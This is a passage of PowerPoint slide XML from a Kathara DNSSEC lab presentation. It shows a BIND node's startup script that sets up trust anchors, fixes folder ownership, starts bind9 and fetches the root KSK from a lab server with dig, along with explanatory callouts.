                <a:t>bind:bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind /var/cache/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chmod</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R 770 /var/cache/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>systemctl</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> start bind9</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    echo " Waiting for key from </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsroot</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> (10.0.3.5)..."</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    while ! dig @10.0.3.5 . DNSKEY | grep -q "257 3 13"; do</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    ...</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13322" name="AutoShape 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2FB2741-0F66-7FB7-6CE2-F3A46B7E7AA3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2491" y="3333"/>
              <a:ext cx="622" cy="57"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>p</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>c4.startup</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73235C6F-DC10-B7E6-F127-4CB01064C634}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7895099" y="2997163"/>
            <a:ext cx="3470176" cy="685106"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -68278"/>
              <a:gd name="adj2" fmla="val 91956"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>create a file called trusted-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>key.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> with empty content</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCE07525-B36E-83C3-C088-0542B9042E57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8073229" y="4110871"/>
            <a:ext cx="3830316" cy="954831"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -97007"/>
              <a:gd name="adj2" fmla="val -30201"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>create the folder where BIND usually manages cryptographic keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{988425FD-DC6E-12C5-A56A-523C45B429DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5469952" y="5237801"/>
            <a:ext cx="3470176" cy="685106"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -79571"/>
              <a:gd name="adj2" fmla="val -152447"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>change the "owner" of these folders to the bind user</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="45026018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AE70E2-78B4-FFD6-E303-3CAE71370A86}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="Rectangle 95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FAE7B3E-487F-64AD-805B-00B25E4F557A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66818E3E-4120-09BC-6E02-B6A807C5562A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4DB942A-0156-B286-016F-EF53BB75A0FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13319" name="Group 117">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A4A007B-6627-8494-61B5-24C830CF2E4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609092" y="1217551"/>
            <a:ext cx="11199450" cy="5063541"/>
            <a:chOff x="2448" y="3333"/>
            <a:chExt cx="3786" cy="722"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13321" name="AutoShape 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDCB0247-CDDF-AD79-5F74-06CD23F1CCFE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2448" y="3362"/>
              <a:ext cx="3786" cy="693"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>...</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>echo 'trust-anchors {};' &gt; /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/trusted-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>key.conf</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind:bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind /var/cache/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chmod</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R 770 /var/cache/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>systemctl</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> start bind9</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    echo " Waiting for key from </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsroot</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> (10.0.3.5)..."</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    while ! dig @10.0.3.5 . DNSKEY | grep -q "257 3 13"; do</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>        sleep 2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    done</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    RECORD=$(dig @10.0.3.5 . DNSKEY | grep "257 3 13" | head -n 1)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    F=$(echo $RECORD | awk '{print $5}')</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    P=$(echo $RECORD | awk '{print $6}')</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    A=$(echo $RECORD | awk '{print $7}')</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    K=$(echo $RECORD | awk '{$1=$2=$3=$4=$5=$6=$7=""; print $0}' | tr -d '[:space:]’) </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    ...</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13322" name="AutoShape 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94486DAB-61CB-A230-8389-84859D65B49F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
